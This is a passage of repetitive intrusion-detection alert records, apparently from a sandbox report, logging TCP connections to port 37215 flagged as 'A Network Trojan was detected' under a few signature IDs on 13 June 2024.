              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401290
              SID:2829579
              Source Port:41952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:12.302807
              SID:2840515
              Source Port:47608
              Destination Port:4554
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711043
              SID:2829579
              Source Port:43426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724869
              SID:2835222
              Source Port:50668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502901
              SID:2829579
              Source Port:58506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.102059
              SID:2829579
              Source Port:48286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213732
              SID:2829579
              Source Port:54558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613341
              SID:2835222
              Source Port:35716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546007
              SID:2829579
              Source Port:53928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611551
              SID:2835222
              Source Port:53338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227610
              SID:2829579
              Source Port:51268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708441
              SID:2835222
              Source Port:59966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159837
              SID:2829579
              Source Port:58910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045687
              SID:2829579
              Source Port:57904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194964
              SID:2835222
              Source Port:43340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074072
              SID:2829579
              Source Port:35680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457722
              SID:2829579
              Source Port:59934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126395
              SID:2835222
              Source Port:59986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570695
              SID:2829579
              Source Port:36472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909085
              SID:2835222
              Source Port:45930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629935
              SID:2829579
              Source Port:50426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990200
              SID:2829579
              Source Port:33294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.693831
              SID:2835222
              Source Port:41024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230963
              SID:2835222
              Source Port:52482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911311
              SID:2829579
              Source Port:36580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458567
              SID:2829579
              Source Port:34264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349538
              SID:2829579
              Source Port:47340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155567
              SID:2829579
              Source Port:35188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.634536
              SID:2835222
              Source Port:47168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731338
              SID:2835222
              Source Port:40260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437572
              SID:2829579
              Source Port:44154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131827
              SID:2835222
              Source Port:55658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160955
              SID:2835222
              Source Port:55608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508581
              SID:2829579
              Source Port:43306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155399
              SID:2835222
              Source Port:32934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.501585
              SID:2835222
              Source Port:52362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210161
              SID:2829579
              Source Port:47514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.523463
              SID:2829579
              Source Port:37528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658425
              SID:2835222
              Source Port:54654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151276
              SID:2835222
              Source Port:45726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555211
              SID:2835222
              Source Port:40884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731259
              SID:2829579
              Source Port:54450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230550
              SID:2835222
              Source Port:48268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176782
              SID:2829579
              Source Port:51234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507230
              SID:2835222
              Source Port:55904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320272
              SID:2829579
              Source Port:43344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377030
              SID:2829579
              Source Port:39450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573208
              SID:2829579
              Source Port:54260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180808
              SID:2835222
              Source Port:41100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657703
              SID:2835222
              Source Port:43282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635066
              SID:2829579
              Source Port:48446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509705
              SID:2835222
              Source Port:40566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318247
              SID:2829579
              Source Port:36510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507465
              SID:2835222
              Source Port:56282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697582
              SID:2829579
              Source Port:35534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098937
              SID:2835222
              Source Port:51340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355527
              SID:2835222
              Source Port:54974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379465
              SID:2835222
              Source Port:51708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370631
              SID:2835222
              Source Port:57746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488877
              SID:2829579
              Source Port:36124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403936
              SID:2829579
              Source Port:42504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.305342
              SID:2835222
              Source Port:57914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372818
              SID:2835222
              Source Port:51586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092072
              SID:2835222
              Source Port:45528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377196
              SID:2829579
              Source Port:37278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402598
              SID:2829579
              Source Port:41904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133875
              SID:2835222
              Source Port:51986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220772
              SID:2829579
              Source Port:33550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677408
              SID:2835222
              Source Port:52072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614228
              SID:2829579
              Source Port:48096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546458
              SID:2835222
              Source Port:50232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993909
              SID:2835222
              Source Port:42628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359168
              SID:2835222
              Source Port:38630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.023353
              SID:2835222
              Source Port:54972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509916
              SID:2829579
              Source Port:33406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078179
              SID:2835222
              Source Port:45944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376549
              SID:2829579
              Source Port:52908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786207
              SID:2835222
              Source Port:50532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359373
              SID:2829579
              Source Port:49014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.194620
              SID:2829579
              Source Port:52804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406352
              SID:2835222
              Source Port:52056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.303795
              SID:2829579
              Source Port:48410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253083
              SID:2835222
              Source Port:40878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.556026
              SID:2829579
              Source Port:60716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975002
              SID:2829579
              Source Port:36298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128690
              SID:2829579
              Source Port:57034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228636
              SID:2835222
              Source Port:54854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154819
              SID:2829579
              Source Port:52568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403689
              SID:2829579
              Source Port:51402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554712
              SID:2835222
              Source Port:56962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090953
              SID:2835222
              Source Port:39284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174832
              SID:2829579
              Source Port:49090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108057
              SID:2835222
              Source Port:58270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.084760
              SID:2835222
              Source Port:45246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213283
              SID:2829579
              Source Port:43340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309170
              SID:2835222
              Source Port:48626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728588
              SID:2829579
              Source Port:40654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801248
              SID:2829579
              Source Port:49174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543070
              SID:2835222
              Source Port:41230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098010
              SID:2829579
              Source Port:55436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506133
              SID:2835222
              Source Port:47542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.510171
              SID:2829579
              Source Port:53026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994124
              SID:2835222
              Source Port:48436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755311
              SID:2829579
              Source Port:42922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079211
              SID:2829579
              Source Port:38744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091696
              SID:2835222
              Source Port:49782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174278
              SID:2829579
              Source Port:35962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940834
              SID:2829579
              Source Port:38310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264622
              SID:2829579
              Source Port:41256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910337
              SID:2829579
              Source Port:53048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992557
              SID:2829579
              Source Port:59540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369232
              SID:2835222
              Source Port:45496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564360
              SID:2835222
              Source Port:40478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669718
              SID:2829579
              Source Port:49826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404238
              SID:2829579
              Source Port:43436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294295
              SID:2829579
              Source Port:33120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669572
              SID:2829579
              Source Port:56050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095756
              SID:2829579
              Source Port:39132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.671022
              SID:2835222
              Source Port:47172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804397
              SID:2829579
              Source Port:59398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438166
              SID:2829579
              Source Port:45838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.844039
              SID:2835222
              Source Port:36038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.994121
              SID:2835222
              Source Port:56988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943912
              SID:2829579
              Source Port:38694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613113
              SID:2829579
              Source Port:44432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374173
              SID:2835222
              Source Port:49092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421926
              SID:2829579
              Source Port:46744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220677
              SID:2835222
              Source Port:49076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265781
              SID:2835222
              Source Port:48888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028631
              SID:2835222
              Source Port:52510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437989
              SID:2829579
              Source Port:48362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421877
              SID:2829579
              Source Port:60122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042859
              SID:2835222
              Source Port:37946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418370
              SID:2829579
              Source Port:32912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824520
              SID:2835222
              Source Port:52562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306300
              SID:2835222
              Source Port:32964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.986685
              SID:2829579
              Source Port:46528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217565
              SID:2835222
              Source Port:42990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457558
              SID:2829579
              Source Port:53048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156528
              SID:2829579
              Source Port:42752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160748
              SID:2829579
              Source Port:60014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731232
              SID:2835222
              Source Port:45366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751968
              SID:2835222
              Source Port:43974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358871
              SID:2829579
              Source Port:51396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078267
              SID:2835222
              Source Port:45078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527480
              SID:2835222
              Source Port:52418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152648
              SID:2835222
              Source Port:34318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912670
              SID:2829579
              Source Port:48030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216973
              SID:2829579
              Source Port:52456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089707
              SID:2829579
              Source Port:40574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091458
              SID:2829579
              Source Port:60334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550385
              SID:2829579
              Source Port:49842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553175
              SID:2829579
              Source Port:40712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988087
              SID:2829579
              Source Port:54326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730965
              SID:2829579
              Source Port:54310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823787
              SID:2829579
              Source Port:33192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.073784
              SID:2829579
              Source Port:43082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476354
              SID:2835222
              Source Port:50728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419972
              SID:2829579
              Source Port:54818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168733
              SID:2835222
              Source Port:44646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670241
              SID:2835222
              Source Port:45962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028699
              SID:2835222
              Source Port:47340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676246
              SID:2835222
              Source Port:50952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091900
              SID:2829579
              Source Port:59058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614024
              SID:2829579
              Source Port:57440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945451
              SID:2835222
              Source Port:42634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456656
              SID:2829579
              Source Port:54672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402456
              SID:2829579
              Source Port:53156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610106
              SID:2829579
              Source Port:39414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.953985
              SID:2835222
              Source Port:58204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158450
              SID:2829579
              Source Port:57438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.102596
              SID:2829579
              Source Port:60416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279541
              SID:2835222
              Source Port:36380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440540
              SID:2835222
              Source Port:57086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096503
              SID:2835222
              Source Port:50322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170031
              SID:2829579
              Source Port:42110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969306
              SID:2829579
              Source Port:41108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125948
              SID:2835222
              Source Port:47980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193266
              SID:2835222
              Source Port:59838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166549
              SID:2829579
              Source Port:41270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012480
              SID:2829579
              Source Port:54852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943122
              SID:2835222
              Source Port:60604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093007
              SID:2835222
              Source Port:41214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253173
              SID:2829579
              Source Port:38574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551045
              SID:2829579
              Source Port:51144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012392
              SID:2835222
              Source Port:33238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214450
              SID:2835222
              Source Port:52526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303244
              SID:2835222
              Source Port:52540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.788332
              SID:2829579
              Source Port:52194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611471
              SID:2835222
              Source Port:36968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213876
              SID:2829579
              Source Port:45592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253798
              SID:2835222
              Source Port:46420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.194570
              SID:2829579
              Source Port:33566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503044
              SID:2835222
              Source Port:47244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375464
              SID:2829579
              Source Port:51098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348262
              SID:2829579
              Source Port:52230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306772
              SID:2829579
              Source Port:56620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
